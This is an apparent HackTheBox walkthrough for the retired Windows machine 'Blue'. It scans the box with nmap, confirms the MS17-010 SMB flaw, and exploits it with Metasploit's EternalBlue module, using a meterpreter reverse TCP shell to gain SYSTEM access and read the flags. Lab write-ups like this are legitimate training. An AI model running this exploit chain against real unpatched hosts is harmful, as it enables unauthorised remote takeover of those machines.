Blue HackTheBox WalkThrough
This is Blue HackTheBox machine walkthrough and is the 11th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Blue HTB machine. Before starting let us know something about this machine. It is a windows box with IP address 10.10.10.40 and difficulty low assigned by its maker.
This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Blue machine by pinging its IP 10.10.10.40. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-
Scanning
$ nmap -sC -sV -oN blue.nmap 10.10.10.40
Nmap revealed that many number of ports are open. Microsoft RPC on port 135, netbios-ssn on port 139 and SMB on port 445 are running. Among all open ports only ports 135, 139 and 445 are useful for us because we can enumerate a lot on these ports. We have tools like smbmap, smbclient, enum4linux, rpcclient and even more to enumerate on these 3 ports.
Before going further for enumeration on port 445 for SMB shares we should not forget to test for NSA's EternalBlue Exploit which was leaked by Shadow Broker hacker group in 2017. For more information about this exploit you should read this Wikipedia article.
So whenever you see smb service is running on port 445 or 135 then first exploit that should strike to your mind is EternalBlue Doublepulsar whose detail was issued in Microsoft bulletin ms17-010. To check whether this machine is vulnerable to eternalblue exploit there is an nmap script smb-vuln-ms17-010.nse and also a metasploit auxiliary module auxiliary/scanner/smb/smb_ms17_010 which scan the machine for ms17-10 patch. You can use any one method to check. I have used both the methods just to show you the vulnerability.
Checking For ms17-010 Exploit
$ nmap -p 445 10.10.10.40 --script=smb-vuln-ms17-010.nse
Nmap script smb-vuln-ms17-010.nse revealed that Blue machine is vulnerable to ms17-010 exploit. Let us check it with metasploit’s auxiliary module auxiliary/scanner/smb/smb_ms17_010 for this vulnerability.
msf5 > search eternalblue
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
Metasploit module also revealed that it is vulnerable to ms17-010 exploit. Let us know something about ms17-10 exploit. Basically ms17-010 is an exploit suit which consists of 5 exploits. Among them first two is scanner and last three are exploiter. Since we have confirmed that it is vulnerable to ms17-010 exploit so any one of the exploit from last three of them can help in getting shell. I tried first one and could easily got user shell.
Getting User Shell
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
So we have got shell very easily and that too with admin privilege. Now we don’t require to escalate privilege because we are already an NT AUTHORITY\SYSTEM which is the highest level of privilege a windows user has. I think since this machine was vulnerable to eternalblue exploit that’s why it is named as blue by its maker which is suffix of eternalblue. Let’s capture user and root flag.
Capture User Flag
meterpreter > cat "C:\Users\haris\Desktop\user.txt"
Capture Root Flag
meterpreter > cat "C:\Users\Administrator\Desktop\root.txt"
This was how I rooted Blue HackTheBox machine. This was very easy box. Hope you guys have learnt some new things from this walkthrough. Thanks for reading this writeup. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next retired machine walkthrough is Nineveh.
